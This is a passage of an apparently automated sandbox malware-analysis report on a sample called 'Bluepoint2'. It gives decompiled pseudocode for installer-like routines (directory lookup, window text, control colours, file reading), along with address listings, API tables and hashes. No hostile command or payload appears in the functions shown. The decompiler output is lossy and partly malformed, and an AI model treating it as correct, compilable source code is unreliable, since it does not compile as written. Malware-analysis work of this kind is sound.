										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                                                                    0x004066a5
                                                                                                                                    0x004066a5
                                                                                                                                    0x004066a5
                                                                                                                                    0x004066ab
                                                                                                                                    0x004066b0
                                                                                                                                    0x004066c1
                                                                                                                                    0x004066c1
                                                                                                                                    0x004066c9
                                                                                                                                    0x004066ca
                                                                                                                                    0x004066cb
                                                                                                                                    0x004066cc
                                                                                                                                    0x004066cf
                                                                                                                                    0x004066d7
                                                                                                                                    0x004066d9
                                                                                                                                    0x004066ea
                                                                                                                                    0x004066ed
                                                                                                                                    0x004066ed
                                                                                                                                    0x004066f1
                                                                                                                                    0x004066f7
                                                                                                                                    0x004066fa
                                                                                                                                    0x004068d5
                                                                                                                                    0x004068d5
                                                                                                                                    0x004068e0
                                                                                                                                    0x004068ec
                                                                                                                                    0x004068ec
                                                                                                                                    0x00000000
                                                                                                                                    0x00406700
                                                                                                                                    0x00406705
                                                                                                                                    0x0040671a
                                                                                                                                    0x0040671b
                                                                                                                                    0x00406721
                                                                                                                                    0x004068b3
                                                                                                                                    0x004068c1
                                                                                                                                    0x004068c4
                                                                                                                                    0x004068c4
                                                                                                                                    0x004068b5
                                                                                                                                    0x004068b8
                                                                                                                                    0x004068bb
                                                                                                                                    0x004068bd
                                                                                                                                    0x004068bd
                                                                                                                                    0x004068c6
                                                                                                                                    0x004068c6
                                                                                                                                    0x004068cc
                                                                                                                                    0x004068cf
                                                                                                                                    0x00406702
                                                                                                                                    0x00000000
                                                                                                                                    0x00406702
                                                                                                                                    0x00000000
                                                                                                                                    0x004068cf
                                                                                                                                    0x00406727
                                                                                                                                    0x0040672a
                                                                                                                                    0x00406739
                                                                                                                                    0x00406740
                                                                                                                                    0x0040674c
                                                                                                                                    0x0040674f
                                                                                                                                    0x00406752
                                                                                                                                    0x00406753
                                                                                                                                    0x00406758
                                                                                                                                    0x0040675e
                                                                                                                                    0x00406761
                                                                                                                                    0x00406764
                                                                                                                                    0x00406857
                                                                                                                                    0x0040685c
                                                                                                                                    0x0040688f
                                                                                                                                    0x00406894
                                                                                                                                    0x00406899
                                                                                                                                    0x0040689e
                                                                                                                                    0x0040689e
                                                                                                                                    0x004068a3
                                                                                                                                    0x004068a9
                                                                                                                                    0x004068ac
                                                                                                                                    0x00000000
                                                                                                                                    0x004068ac
                                                                                                                                    0x0040685e
                                                                                                                                    0x00406861
                                                                                                                                    0x00406864
                                                                                                                                    0x00406879
                                                                                                                                    0x00406880
                                                                                                                                    0x00406866
                                                                                                                                    0x0040686d
                                                                                                                                    0x0040686d
                                                                                                                                    0x00406888
                                                                                                                                    0x0040688b
                                                                                                                                    0x0040684f
                                                                                                                                    0x00406850
                                                                                                                                    0x00406850
                                                                                                                                    0x00000000
                                                                                                                                    0x0040688b
                                                                                                                                    0x00406771
                                                                                                                                    0x00406775
                                                                                                                                    0x00406775
                                                                                                                                    0x00406776
                                                                                                                                    0x00406778
                                                                                                                                    0x004067b5
                                                                                                                                    0x004067b8
                                                                                                                                    0x004067c8
                                                                                                                                    0x004067cb
                                                                                                                                    0x004067d3
                                                                                                                                    0x004067d9
                                                                                                                                    0x004067d9
                                                                                                                                    0x00406834
                                                                                                                                    0x00406834
                                                                                                                                    0x00406836
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004067dd
                                                                                                                                    0x004067e2
                                                                                                                                    0x004067e3
                                                                                                                                    0x004067e5
                                                                                                                                    0x004067fc
                                                                                                                                    0x0040680a
                                                                                                                                    0x00406810
                                                                                                                                    0x00406812
                                                                                                                                    0x00406830
                                                                                                                                    0x00406830
                                                                                                                                    0x00406830
                                                                                                                                    0x00000000
                                                                                                                                    0x00406830
                                                                                                                                    0x00406818
                                                                                                                                    0x00406821
                                                                                                                                    0x00406824
                                                                                                                                    0x0040682a
                                                                                                                                    0x0040682e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040682e
                                                                                                                                    0x004067f6
                                                                                                                                    0x004067f8
                                                                                                                                    0x004067fa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004067fa
                                                                                                                                    0x00000000
                                                                                                                                    0x00406834
                                                                                                                                    0x004067c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0040677a
                                                                                                                                    0x00406798
                                                                                                                                    0x004067a1
                                                                                                                                    0x0040683e
                                                                                                                                    0x00406842
                                                                                                                                    0x0040684a
                                                                                                                                    0x0040684a
                                                                                                                                    0x00000000
                                                                                                                                    0x00406842
                                                                                                                                    0x004067ab
                                                                                                                                    0x00406838
                                                                                                                                    0x0040683c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040683c
                                                                                                                                    0x00406778
                                                                                                                                    0x00000000
                                                                                                                                    0x00406705

                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                                    • lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 4260037668-1230650788
                                                                                                                                    • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                                                                    • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                                                                    • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                                                                    • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                                                                    0x004056d0
                                                                                                                                    0x004056da
                                                                                                                                    0x004056df
                                                                                                                                    0x004056e5
                                                                                                                                    0x004056f0
                                                                                                                                    0x004056f3
                                                                                                                                    0x004056f6
                                                                                                                                    0x004056fc
                                                                                                                                    0x004056fc
                                                                                                                                    0x00405702
                                                                                                                                    0x0040570a
                                                                                                                                    0x0040570d
                                                                                                                                    0x0040572a
                                                                                                                                    0x0040572e
                                                                                                                                    0x00405737
                                                                                                                                    0x00405737
                                                                                                                                    0x00405741
                                                                                                                                    0x0040574a
                                                                                                                                    0x00405756
                                                                                                                                    0x0040575d
                                                                                                                                    0x00405761
                                                                                                                                    0x00405764
                                                                                                                                    0x00405777
                                                                                                                                    0x00405785
                                                                                                                                    0x00405785
                                                                                                                                    0x00405789
                                                                                                                                    0x0040578b
                                                                                                                                    0x0040578e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040578e
                                                                                                                                    0x0040570f
                                                                                                                                    0x00405717
                                                                                                                                    0x0040571f
                                                                                                                                    0x00405725
                                                                                                                                    0x00000000
                                                                                                                                    0x00405725
                                                                                                                                    0x0040571f
                                                                                                                                    0x0040570d
                                                                                                                                    0x0040579a

                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                    • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                    • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                                                    • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                    • String ID: ('B
                                                                                                                                    • API String ID: 1495540970-2332581011
                                                                                                                                    • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                                                                    • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                                                                    • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                                                                    • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                                    0x0040463d
                                                                                                                                    0x004046f3
                                                                                                                                    0x00000000
                                                                                                                                    0x004046f3
                                                                                                                                    0x0040464e
                                                                                                                                    0x00404652
                                                                                                                                    0x00000000
                                                                                                                                    0x0040466c
                                                                                                                                    0x0040466c
                                                                                                                                    0x00404675
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404677
                                                                                                                                    0x00404683
                                                                                                                                    0x00404686
                                                                                                                                    0x00404686
                                                                                                                                    0x0040468c
                                                                                                                                    0x00404692
                                                                                                                                    0x00404692
                                                                                                                                    0x0040469e
                                                                                                                                    0x004046a4
                                                                                                                                    0x004046ab
                                                                                                                                    0x004046ae
                                                                                                                                    0x004046b1
                                                                                                                                    0x004046b3
                                                                                                                                    0x004046b3
                                                                                                                                    0x004046bb
                                                                                                                                    0x004046c1
                                                                                                                                    0x004046c1
                                                                                                                                    0x004046cb
                                                                                                                                    0x004046d0
                                                                                                                                    0x004046d3
                                                                                                                                    0x004046d8
                                                                                                                                    0x004046db
                                                                                                                                    0x004046db
                                                                                                                                    0x004046eb
                                                                                                                                    0x004046eb
                                                                                                                                    0x00000000
                                                                                                                                    0x004046ee

                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00404686
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                                                                    • GetSysColor.USER32(?), ref: 004046B1
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004046DB
                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                    • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                                                                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                    • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                                                                    0x004026ec
                                                                                                                                    0x004026ee
                                                                                                                                    0x004026f1
                                                                                                                                    0x004026f3
                                                                                                                                    0x004026f6
                                                                                                                                    0x004026fb
                                                                                                                                    0x004026ff
                                                                                                                                    0x00402702
                                                                                                                                    0x00402705
                                                                                                                                    0x00402c2a
                                                                                                                                    0x00402c2d
                                                                                                                                    0x0040270b
                                                                                                                                    0x0040270b
                                                                                                                                    0x00402712
                                                                                                                                    0x00402714
                                                                                                                                    0x00402714
                                                                                                                                    0x0040271a
                                                                                                                                    0x0040287e
                                                                                                                                    0x0040287e
                                                                                                                                    0x00402881
                                                                                                                                    0x00402886
                                                                                                                                    0x004015b6
                                                                                                                                    0x0040292e
                                                                                                                                    0x0040292e
                                                                                                                                    0x00000000
                                                                                                                                    0x00402720
                                                                                                                                    0x00402721
                                                                                                                                    0x0040272c
                                                                                                                                    0x0040272f
                                                                                                                                    0x0040273b
                                                                                                                                    0x0040273f
                                                                                                                                    0x004027d7
                                                                                                                                    0x004027ef
                                                                                                                                    0x004027ff
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402745
                                                                                                                                    0x00402745
                                                                                                                                    0x00402748
                                                                                                                                    0x00402749
                                                                                                                                    0x0040274c
                                                                                                                                    0x00402751
                                                                                                                                    0x00402758
                                                                                                                                    0x00402760
                                                                                                                                    0x00000000
                                                                                                                                    0x00402766
                                                                                                                                    0x00402766
                                                                                                                                    0x0040276b
                                                                                                                                    0x00000000
                                                                                                                                    0x00402771
                                                                                                                                    0x00402771
                                                                                                                                    0x00402779
                                                                                                                                    0x0040277c
                                                                                                                                    0x0040277f
                                                                                                                                    0x0040283a
                                                                                                                                    0x00402841
                                                                                                                                    0x00402785
                                                                                                                                    0x0040278b
                                                                                                                                    0x00402797
                                                                                                                                    0x00402801
                                                                                                                                    0x00402801
                                                                                                                                    0x00402799
                                                                                                                                    0x00402799
                                                                                                                                    0x0040279c
                                                                                                                                    0x0040279e
                                                                                                                                    0x0040279e
                                                                                                                                    0x0040279e
                                                                                                                                    0x004027a1
                                                                                                                                    0x004027a6
                                                                                                                                    0x004027a9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004027ab
                                                                                                                                    0x004027ae
                                                                                                                                    0x004027bc
                                                                                                                                    0x004027c2
                                                                                                                                    0x004027d0
                                                                                                                                    0x00000000
                                                                                                                                    0x004027d2
                                                                                                                                    0x00000000
                                                                                                                                    0x004027d2
                                                                                                                                    0x00000000
                                                                                                                                    0x004027d0
                                                                                                                                    0x0040279e
                                                                                                                                    0x00402804
                                                                                                                                    0x00402807
                                                                                                                                    0x00000000
                                                                                                                                    0x00402809
                                                                                                                                    0x0040280e
                                                                                                                                    0x0040284f
                                                                                                                                    0x00402871
                                                                                                                                    0x00402878
                                                                                                                                    0x0040285d
                                                                                                                                    0x0040285d
                                                                                                                                    0x00402860
                                                                                                                                    0x00402863
                                                                                                                                    0x00402866
                                                                                                                                    0x00402866
                                                                                                                                    0x00000000
                                                                                                                                    0x00402817
                                                                                                                                    0x00402817
                                                                                                                                    0x0040281a
                                                                                                                                    0x0040281d
                                                                                                                                    0x00402823
                                                                                                                                    0x00402827
                                                                                                                                    0x0040282a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040282a
                                                                                                                                    0x0040280e
                                                                                                                                    0x00402807
                                                                                                                                    0x0040277f
                                                                                                                                    0x0040276b
                                                                                                                                    0x00402760
                                                                                                                                    0x00000000
                                                                                                                                    0x0040282c
                                                                                                                                    0x0040282c
                                                                                                                                    0x0040282f
                                                                                                                                    0x00402838
                                                                                                                                    0x00000000
                                                                                                                                    0x0040272f
                                                                                                                                    0x0040271a
                                                                                                                                    0x00402c33
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                      • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
